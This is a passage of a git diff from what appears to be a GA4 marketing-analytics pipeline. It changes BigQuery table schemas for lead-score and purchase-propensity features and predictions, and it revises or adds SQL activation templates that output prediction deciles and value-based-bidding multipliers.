"file_download_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "file_download_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "file_download_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "file_download_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "file_download_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "recipe_add_to_list_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past day" + }, + { + "name": "recipe_add_to_list_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 2nd day" + }, + { + "name": "recipe_add_to_list_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 3rd day" + }, + { + "name": "recipe_add_to_list_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 4th day" + }, + { + "name": "recipe_add_to_list_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 5th day" + }, + { + "name": "recipe_print_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past day" + }, + { + "name": "recipe_print_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 2nd day" + }, + { + "name": "recipe_print_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 3rd day" + }, + { + "name": "recipe_print_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 4th day" + }, + { + "name": "recipe_print_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 5th day" + }, + { + "name": "sign_up_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "sign_up_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "sign_up_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "sign_up_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "sign_up_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_favorite_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_favorite_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_favorite_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_favorite_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_favorite_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_add_to_menu_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_add_to_menu_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_add_to_menu_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_add_to_menu_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_add_to_menu_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "will_login", + "type": "INTEGER", + "description": "A boolean indicating whether the user will login in the next period" + } +] \ No newline at end of file diff --git a/sql/schema/table/purchase_propensity_inference_preparation.json b/sql/schema/table/purchase_propensity_inference_preparation.json index 0fe328b2..2f8b1256 100644 --- a/sql/schema/table/purchase_propensity_inference_preparation.json +++ b/sql/schema/table/purchase_propensity_inference_preparation.json @@ -109,161 +109,6 @@ "type": "BOOLEAN", "description": "A boolean indicating whether the user has signed in with an user id" }, - { - "name": "engagement_rate", - "type": "FLOAT", - "description": "The percentage of sessions that were engaged sessions. Engagement rate = engaged sessions / total sessions Engagement rate is the inverse of bounce rate" - }, - { - "name": "engaged_sessions_per_user", - "type": "INTEGER", - "description": "The number of engaged sessions per user" - }, - { - "name": "session_conversion_rate", - "type": "FLOAT", - "description": "The session conversion rate is calculated by dividing the number of sessions with a conversion event by the total number of sessions" - }, - { - "name": "bounces", - "type": "INTEGER", - "description": "The number of not engaged sessions" - }, - { - "name": "bounce_rate_per_user", - "type": "FLOAT", - "description": "The percentage of sessions that were not engaged sessions per user. Bounce rate = not engaged sessions / total sessions Bounce rate is the inverse of engagement rate" - }, - { - "name": "sessions_per_user", - "type": "INTEGER", - "description": "The number of sessions per user" - }, - { - "name": "avg_views_per_session", - "type": "FLOAT", - "description": "The average number of views per sessions" - }, - { - "name": "sum_engagement_time_seconds", - "type": "FLOAT", - "description": "The sum of time that your website was in focus in a user's browser or an app was in the foreground of a user's device in seconds per user" - }, - { - "name": "avg_engagement_time_seconds", - "type": "FLOAT", - "description": "The average time that your website was in focus in a user's browser or an app was in the foreground of a user's device. Average engagement time = total user engagement durations / number of active users" - }, - { - "name": "new_visits", - "type": "INTEGER", - "description": "The number of times your users opened your website for the first time" - }, - { - "name": "returning_visits", - "type": "INTEGER", - "description": "The number of users who have initiated at least one previous session, regardless of whether or not the previous sessions were engaged sessions" - }, - { - "name": "add_to_carts", - "type": "INTEGER", - "description": "The number of times users added items to their shopping carts" - }, - { - "name": "cart_to_view_rate", - "type": "FLOAT", - "description": "The number of times users added items to their shopping carts divided by the the number of mobile app screens or web pages your users saw. Repeated views of a single screen or page are counted" - }, - { - "name": "checkouts", - "type": "INTEGER", - "description": "The number of times users started the checkout process" - }, - { - "name": "ecommerce_purchases", - "type": "INTEGER", - "description": "The number of purchases on your website or app" - }, - { - "name": "ecommerce_quantity", - "type": "INTEGER", - "description": "The number of units for an ecommerce event" - }, - { - "name": "ecommerce_revenue", - "type": "FLOAT", - "description": "The sum of revenue from purchases made on your website or app, minus any refunds given. Purchase revenue = purchases + in-app purchases + subscriptions - refund" - }, - { - "name": "item_revenue", - "type": "FLOAT", - "description": "The total revenue from items only minus refunds, excluding tax and shipping" - }, - { - "name": "item_quantity", - "type": "INTEGER", - "description": "The number of units for a single item included in ecommerce events" - }, - { - "name": "item_view_events", - "type": "INTEGER", - "description": "The number of times an item was viewed" - }, - { - "name": "items_clicked_in_promotion", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a promotion" - }, - { - "name": "items_clicked_in_list", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a list of items" - }, - { - "name": "items_checked_out", - "type": "INTEGER", - "description": "The number of times the user has checked out" - }, - { - "name": "items_added_to_cart", - "type": "INTEGER", - "description": "The number of times the user has added items to cart" - }, - { - "name": "item_list_view_events", - "type": "INTEGER", - "description": "The number of times the user has viewed items in list" - }, - { - "name": "purchase_revenue", - "type": "FLOAT", - "description": "The total revenue from purchases, in-app purchases, subscriptions, and ad revenue. Total revenue = purchases + in-app purchases + subscriptions + ad revenue - refunds" - }, - { - "name": "purchase_to_view_rate", - "type": "FLOAT", - "description": "The number of purchases on your website or app divided by the number of mobile app screens or web pages your users saw" - }, - { - "name": "transactions_per_purchaser", - "type": "FLOAT", - "description": "The average number of purchases per buyer for the selected time frame" - }, - { - "name": "user_conversion_rate", - "type": "FLOAT", - "description": "The number of users who performed a conversion action divided by the total number of users" - }, - { - "name": "how_many_purchased_before", - "type": "INTEGER", - "description": "The number of times the user have purchased before" - }, - { - "name": "has_abandoned_cart", - "type": "BOOLEAN", - "description": "a boolean indicating whether the user has abandoned a cart in the past" - }, { "name": "active_users_past_1_day", "type": "INTEGER", diff --git a/sql/schema/table/purchase_propensity_predictions_placeholder.json b/sql/schema/table/purchase_propensity_predictions_placeholder.json new file mode 100644 index 00000000..39651f90 --- /dev/null +++ b/sql/schema/table/purchase_propensity_predictions_placeholder.json @@ -0,0 +1,26 @@ +[ + { + "name": "prediction", + "type": "STRING" + }, + { + "name": "prediction_prob", + "type": "FLOAT" + }, + { + "name": "processed_timestamp", + "type": "TIMESTAMP" + }, + { + "name": "feature_date", + "type": "DATE" + }, + { + "name": "user_pseudo_id", + "type": "STRING" + }, + { + "name": "user_id", + "type": "STRING" + } +] \ No newline at end of file diff --git a/sql/schema/table/purchase_propensity_training_preparation.json b/sql/schema/table/purchase_propensity_training_preparation.json index e5d284d5..f984f42e 100644 --- a/sql/schema/table/purchase_propensity_training_preparation.json +++ b/sql/schema/table/purchase_propensity_training_preparation.json @@ -119,161 +119,6 @@ "type": "BOOLEAN", "description": "A boolean indicating whether the user has signed in with the user id" }, - { - "name": "engagement_rate", - "type": "FLOAT", - "description": "The percentage of sessions that were engaged sessions. Engagement rate = engaged sessions / total sessions Engagement rate is the inverse of bounce rate" - }, - { - "name": "engaged_sessions_per_user", - "type": "INTEGER", - "description": "The number of engaged sessions per user" - }, - { - "name": "session_conversion_rate", - "type": "FLOAT", - "description": "The session conversion rate is calculated by dividing the number of sessions with a conversion event by the total number of sessions" - }, - { - "name": "bounces", - "type": "INTEGER", - "description": "The number of not engaged sessions" - }, - { - "name": "bounce_rate_per_user", - "type": "FLOAT", - "description": "The percentage of sessions that were not engaged sessions per user. Bounce rate = not engaged sessions / total sessions Bounce rate is the inverse of engagement rate" - }, - { - "name": "sessions_per_user", - "type": "INTEGER", - "description": "The number of sessions per user" - }, - { - "name": "avg_views_per_session", - "type": "FLOAT", - "description": "The average number of views per sessions" - }, - { - "name": "sum_engagement_time_seconds", - "type": "FLOAT", - "description": "The sum of time that your website was in focus in a user's browser or an app was in the foreground of a user's device in seconds per user" - }, - { - "name": "avg_engagement_time_seconds", - "type": "FLOAT", - "description": "The average time that your website was in focus in a user's browser or an app was in the foreground of a user's device. Average engagement time = total user engagement durations / number of active users" - }, - { - "name": "new_visits", - "type": "INTEGER", - "description": "The number of times your users opened your website for the first time" - }, - { - "name": "returning_visits", - "type": "INTEGER", - "description": "The number of users who have initiated at least one previous session, regardless of whether or not the previous sessions were engaged sessions" - }, - { - "name": "add_to_carts", - "type": "INTEGER", - "description": "The number of times users added items to their shopping carts" - }, - { - "name": "cart_to_view_rate", - "type": "FLOAT", - "description": "The number of times users added items to their shopping carts divided by the the number of mobile app screens or web pages your users saw. Repeated views of a single screen or page are counted" - }, - { - "name": "checkouts", - "type": "INTEGER", - "description": "The number of times users started the checkout process" - }, - { - "name": "ecommerce_purchases", - "type": "INTEGER", - "description": "The number of purchases on your website or app" - }, - { - "name": "ecommerce_quantity", - "type": "INTEGER", - "description": "The number of units for an ecommerce event" - }, - { - "name": "ecommerce_revenue", - "type": "FLOAT", - "description": "The sum of revenue from purchases made on your website or app, minus any refunds given. Purchase revenue = purchases + in-app purchases + subscriptions - refund" - }, - { - "name": "item_revenue", - "type": "FLOAT", - "description": "The total revenue from items only minus refunds, excluding tax and shipping" - }, - { - "name": "item_quantity", - "type": "INTEGER", - "description": "The number of units for a single item included in ecommerce events" - }, - { - "name": "item_view_events", - "type": "INTEGER", - "description": "The number of times an item was viewed" - }, - { - "name": "items_clicked_in_promotion", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a promotion" - }, - { - "name": "items_clicked_in_list", - "type": "INTEGER", - "description": "The number of items that the customer clicked in a list of items" - }, - { - "name": "items_checked_out", - "type": "INTEGER", - "description": "The number of times the user has checked out" - }, - { - "name": "items_added_to_cart", - "type": "INTEGER", - "description": "The number of times the user has added items to cart" - }, - { - "name": "item_list_view_events", - "type": "INTEGER", - "description": "The number of times the user has viewed items in list" - }, - { - "name": "purchase_revenue", - "type": "FLOAT", - "description": "The total revenue from purchases, in-app purchases, subscriptions, and ad revenue. Total revenue = purchases + in-app purchases + subscriptions + ad revenue - refunds" - }, - { - "name": "purchase_to_view_rate", - "type": "FLOAT", - "description": "The number of purchases on your website or app divided by the number of mobile app screens or web pages your users saw" - }, - { - "name": "transactions_per_purchaser", - "type": "FLOAT", - "description": "The average number of purchases per buyer for the selected time frame" - }, - { - "name": "user_conversion_rate", - "type": "FLOAT", - "description": "The number of users who performed a conversion action divided by the total number of users" - }, - { - "name": "how_many_purchased_before", - "type": "INTEGER", - "description": "The number of times the user have purchased before" - }, - { - "name": "has_abandoned_cart", - "type": "BOOLEAN", - "description": "a boolean indicating whether the user has abandoned a cart in the past" - }, { "name": "active_users_past_1_day", "type": "INTEGER", @@ -544,131 +389,6 @@ "type": "INTEGER", "description": "The number of times the user has checked out in the past 15 to 30 days" }, - { - "name": "purchasers_users", - "type": "INTEGER", - "description": "The number of distinct users who have purchases in the past" - }, - { - "name": "average_daily_purchasers", - "type": "FLOAT", - "description": "The average number of purchasers across all the days in the selected time frame" - }, - { - "name": "active_users", - "type": "INTEGER", - "description": "The number of distinct users who visited your website or application. An active user is any user who has an engaged session or when Analytics collects: the first_visit event or engagement_time_msec parameter from a website the first_open event or engagement_time_msec parameter from an Android app the first_open or user_engagement event from an iOS app" - }, - { - "name": "DAU", - "type": "FLOAT", - "description": "The number of users who engaged for the calendar day" - }, - { - "name": "MAU", - "type": "FLOAT", - "description": "The number of users who engaged in the last 30 days" - }, - { - "name": "WAU", - "type": "FLOAT", - "description": "The number of users who engaged in the last week" - }, - { - "name": "dau_per_mau", - "type": "FLOAT", - "description": "Daily Active Users (DAU) / Monthly Active Users (MAU) shows the percentage of users who engaged for the calendar day out of the users who engaged in the last 30 days. A higher ratio suggests good engagement and user retention" - }, - { - "name": "dau_per_wau", - "type": "FLOAT", - "description": "Daily Active Users (DAU) / Weekly Active Users (WAU) shows the percentage of users who engaged in the last 24 hours out of the users who engaged in the last 7 days. A higher ratio suggests good engagement and user retention" - }, - { - "name": "wau_per_mau", - "type": "FLOAT", - "description": "Weekly Active Users (DAU) / Monthly Active Users (MAU) shows the percentage of users who engaged in the last 7 days out of the users who engaged in the last 30 days. A higher ratio suggests good engagement and user retention" - }, - { - "name": "users_engagement_duration_seconds", - "type": "FLOAT", - "description": "The length of time that your app screen was in the foreground or your web page was in focus in seconds" - }, - { - "name": "average_engagement_time", - "type": "FLOAT", - "description": "The average time that your website was in focus in a user's browser or an app was in the foreground of a user's device. Average engagement time = total user engagement durations / number of active users" - }, - { - "name": "average_engagement_time_per_session", - "type": "FLOAT", - "description": "The average engagement time per session" - }, - { - "name": "average_sessions_per_user", - "type": "FLOAT", - "description": "The average number of sessions per user" - }, - { - "name": "ARPPU", - "type": "FLOAT", - "description": "Average revenue per paying user (ARPPU) is the total purchase revenue per active user who made a purchase" - }, - { - "name": "ARPU", - "type": "FLOAT", - "description": "Average revenue per active user (ARPU) is the total revenue generated on average from each active user, whether they made a purchase or not. ARPU = (Total ad revenue + purchase revenue + in-app purchase revenue + subscriptions) / Active users" - }, - { - "name": "average_daily_revenue", - "type": "FLOAT", - "description": "Average daily revenue The average total revenue for a day over the selected time frame" - }, - { - "name": "max_daily_revenue", - "type": "FLOAT", - "description": "The maximum total revenue for a day over the selected time frame" - }, - { - "name": "min_daily_revenue", - "type": "FLOAT", - "description": "The minimum total revenue for a day over the selected time frame" - }, - { - "name": "new_users", - "type": "INTEGER", - "description": "The number of new unique user IDs that logged the first_open or first_visit event. The metric allows you to measure the number of users who interacted with your site or launched your app for the first time" - }, - { - "name": "returning_users", - "type": "INTEGER", - "description": "The number of users who have initiated at least one previous session, regardless of whether or not the previous sessions were engaged sessions" - }, - { - "name": "first_time_purchasers", - "type": "INTEGER", - "description": "The number of users who made their first purchase in the selected time frame." - }, - { - "name": "first_time_purchaser_conversion", - "type": "FLOAT", - "description": "The percentage of active users who made their first purchase. This metric is returned as a fraction; for example, 0.092 means 9.2% of active users were first-time purchasers" - }, - { - "name": "first_time_purchasers_per_new_user", - "type": "FLOAT", - "description": "The average number of first-time purchasers per new user" - }, - { - "name": "avg_user_conversion_rate", - "type": "FLOAT", - "description": "The average number of converting user per total users" - }, - { - "name": "avg_session_conversion_rate", - "type": "FLOAT", - "description": "The average number of converting session per total sessions" - }, { "name": "will_purchase", "type": "INTEGER", diff --git a/sql/schema/table/user_rolling_window_lead_metrics.json b/sql/schema/table/user_rolling_window_lead_metrics.json new file mode 100644 index 00000000..e22d0ceb --- /dev/null +++ b/sql/schema/table/user_rolling_window_lead_metrics.json @@ -0,0 +1,242 @@ +[ + { + "name": "processed_timestamp", + "type": "TIMESTAMP", + "description": "Timestamp of when the data was processed" + }, + { + "name": "feature_date", + "type": "DATE", + "description": "The date serving as basis for the features calculation" + }, + { + "name": "user_pseudo_id", + "type": "STRING", + "description": "The user pseudo identifier" + }, + { + "name": "scroll_50_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 1 day" + }, + { + "name": "scroll_50_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 2nd day" + }, + { + "name": "scroll_50_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 3rd day" + }, + { + "name": "scroll_50_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 4th day" + }, + { + "name": "scroll_50_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has been active in the past 5th day" + }, + { + "name": "scroll_90_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past day" + }, + { + "name": "scroll_90_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 2nd day" + }, + { + "name": "scroll_90_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 3rd day" + }, + { + "name": "scroll_90_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 4th day" + }, + { + "name": "scroll_90_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has purchased in the past 5th day" + }, + { + "name": "view_search_results_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "view_search_results_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "view_search_results_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "view_search_results_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "view_search_results_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "file_download_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past day" + }, + { + "name": "file_download_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 2nd day" + }, + { + "name": "file_download_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 3rd day" + }, + { + "name": "file_download_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 4th day" + }, + { + "name": "file_download_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has visited in the past 5th day" + }, + { + "name": "recipe_add_to_list_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past day" + }, + { + "name": "recipe_add_to_list_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 2nd day" + }, + { + "name": "recipe_add_to_list_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 3rd day" + }, + { + "name": "recipe_add_to_list_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 4th day" + }, + { + "name": "recipe_add_to_list_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has viewed items in the past 5th day" + }, + { + "name": "recipe_print_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past day" + }, + { + "name": "recipe_print_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 2nd day" + }, + { + "name": "recipe_print_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 3rd day" + }, + { + "name": "recipe_print_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 4th day" + }, + { + "name": "recipe_print_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has added items to cart in the past 5th day" + }, + { + "name": "sign_up_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "sign_up_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "sign_up_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "sign_up_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "sign_up_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_favorite_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_favorite_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_favorite_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_favorite_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_favorite_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + }, + { + "name": "recipe_add_to_menu_past_1_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past day" + }, + { + "name": "recipe_add_to_menu_past_2_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 2nd day" + }, + { + "name": "recipe_add_to_menu_past_3_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 3rd day" + }, + { + "name": "recipe_add_to_menu_past_4_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 4th day" + }, + { + "name": "recipe_add_to_menu_past_5_day", + "type": "INTEGER", + "description": "The number of times the user has checked out in the past 5th day" + } +] \ No newline at end of file diff --git a/sql/schema/table/vbb_activation_configuration.json b/sql/schema/table/vbb_activation_configuration.json new file mode 100644 index 00000000..f0cbf242 --- /dev/null +++ b/sql/schema/table/vbb_activation_configuration.json @@ -0,0 +1,17 @@ +[ + { + "name": "activation_type", + "type": "STRING", + "description": "Specifies the type of activation, e.g., purchase-propensity" + }, + { + "name": "decile", + "type": "INTEGER", + "description": "Represents the decile number (1-10) for the prediction" + }, + { + "name": "value", + "type": "FLOAT", + "description": "The monetary value multiplier for the given decile, relative to the average transaction value" + } +] diff --git a/templates/activation_query/audience_segmentation_query_template.sqlx b/templates/activation_query/audience_segmentation_query_template.sqlx index 40c8c9a5..89eec5e0 100644 --- a/templates/activation_query/audience_segmentation_query_template.sqlx +++ b/templates/activation_query/audience_segmentation_query_template.sqlx @@ -1,8 +1,9 @@ SELECT - a.prediction AS a_s_prediction, + a.prediction AS user_prop_a_s_prediction, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/auto_audience_segmentation_query_template.sqlx b/templates/activation_query/auto_audience_segmentation_query_template.sqlx index 5b6c0eef..d4f0c02a 100644 --- a/templates/activation_query/auto_audience_segmentation_query_template.sqlx +++ b/templates/activation_query/auto_audience_segmentation_query_template.sqlx @@ -1,12 +1,13 @@ SELECT - a.prediction AS a_a_s_prediction, + a.prediction AS user_prop_a_a_s_prediction, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, `{{source_table}}` a WHERE - a.user_id = b.user_pseudo_id + a.user_pseudo_id = b.user_pseudo_id AND a.prediction IS NOT NULL diff --git a/templates/activation_query/churn_propensity_query_template.sqlx b/templates/activation_query/churn_propensity_query_template.sqlx index 5ab39212..ae42604a 100644 --- a/templates/activation_query/churn_propensity_query_template.sqlx +++ b/templates/activation_query/churn_propensity_query_template.sqlx @@ -1,9 +1,10 @@ SELECT - a.prediction AS c_p_prediction, - NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS c_p_decile, + a.prediction AS user_prop_c_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS user_prop_c_p_decile, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/cltv_query_template.sqlx b/templates/activation_query/cltv_query_template.sqlx index 3a94982d..bdd4bffd 100644 --- a/templates/activation_query/cltv_query_template.sqlx +++ b/templates/activation_query/cltv_query_template.sqlx @@ -1,8 +1,9 @@ SELECT - NTILE(10) OVER (ORDER BY a.prediction DESC) AS cltv_decile, + NTILE(10) OVER (ORDER BY a.prediction DESC) AS user_prop_cltv_decile, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/lead_score_propensity_query_template.sqlx b/templates/activation_query/lead_score_propensity_query_template.sqlx new file mode 100644 index 00000000..5ad0b874 --- /dev/null +++ b/templates/activation_query/lead_score_propensity_query_template.sqlx @@ -0,0 +1,14 @@ +SELECT + a.prediction AS user_prop_l_s_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS user_prop_l_s_p_decile, + b.user_pseudo_id AS client_id, + b.user_id AS user_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, + CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date +FROM + `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, + `{{source_table}}` a +WHERE + COALESCE(a.user_id, "") = COALESCE(b.user_id, "") + AND a.user_pseudo_id = b.user_pseudo_id diff --git a/templates/activation_query/lead_score_propensity_vbb_query_template.sqlx b/templates/activation_query/lead_score_propensity_vbb_query_template.sqlx new file mode 100644 index 00000000..9be0e0a9 --- /dev/null +++ b/templates/activation_query/lead_score_propensity_vbb_query_template.sqlx @@ -0,0 +1,35 @@ +WITH user_prediction_decile AS ( + SELECT + a.prediction AS l_s_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS l_s_p_decile, + b.user_pseudo_id AS client_id, + b.user_id AS user_id, + b.ga_session_id AS session_id, + CASE + WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp + ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) + END AS inference_date + FROM + `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_24_hours` b, + `{{source_table}}` a + WHERE + COALESCE(a.user_id, "") = COALESCE(b.user_id, "") + AND a.user_pseudo_id = b.user_pseudo_id) +SELECT + a.l_s_p_prediction AS user_prop_l_s_p_prediction, + a.l_s_p_decile AS user_prop_l_s_p_decile, + b.value AS event_param_value, + 'USD' AS event_param_currency, + a.client_id, + a.user_id, + a.session_id AS event_param_session_id, + a.inference_date +FROM + user_prediction_decile AS a +LEFT JOIN + `${activation_project_id}.${dataset}.vbb_activation_configuration` AS b +ON + a.l_s_p_decile = b.decile +WHERE + b.activation_type = 'lead-score-propensity' +AND b.value > 0 \ No newline at end of file diff --git a/templates/activation_query/purchase_propensity_query_template.sqlx b/templates/activation_query/purchase_propensity_query_template.sqlx index 40fe5c40..985edf03 100644 --- a/templates/activation_query/purchase_propensity_query_template.sqlx +++ b/templates/activation_query/purchase_propensity_query_template.sqlx @@ -1,9 +1,10 @@ SELECT - a.prediction AS p_p_prediction, - NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS p_p_decile, + a.prediction AS user_prop_p_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS user_prop_p_p_decile, b.user_pseudo_id AS client_id, b.user_id AS user_id, - b.ga_session_id AS session_id, + b.ga_session_id AS event_param_session_id, + '100' AS event_param_engagement_time_msec, CASE WHEN EXTRACT(MICROSECOND FROM b.event_timestamp) = 1 THEN b.event_timestamp ELSE TIMESTAMP_SUB(b.event_timestamp, INTERVAL 1 MICROSECOND) END AS inference_date FROM `${mds_project_id}.marketing_ga4_v1_${mds_dataset_suffix}.latest_event_per_user_last_72_hours` b, diff --git a/templates/activation_query/purchase_propensity_vbb_query_template.sqlx b/templates/activation_query/purchase_propensity_vbb_query_template.sqlx new file mode 100644 index 00000000..f81fce9f --- /dev/null +++ b/templates/activation_query/purchase_propensity_vbb_query_template.sqlx @@ -0,0 +1,35 @@ +WITH user_prediction_decile AS ( + SELECT + a.prediction AS p_p_prediction, + NTILE(10) OVER (ORDER BY a.prediction_prob DESC) AS p_p_decile, + 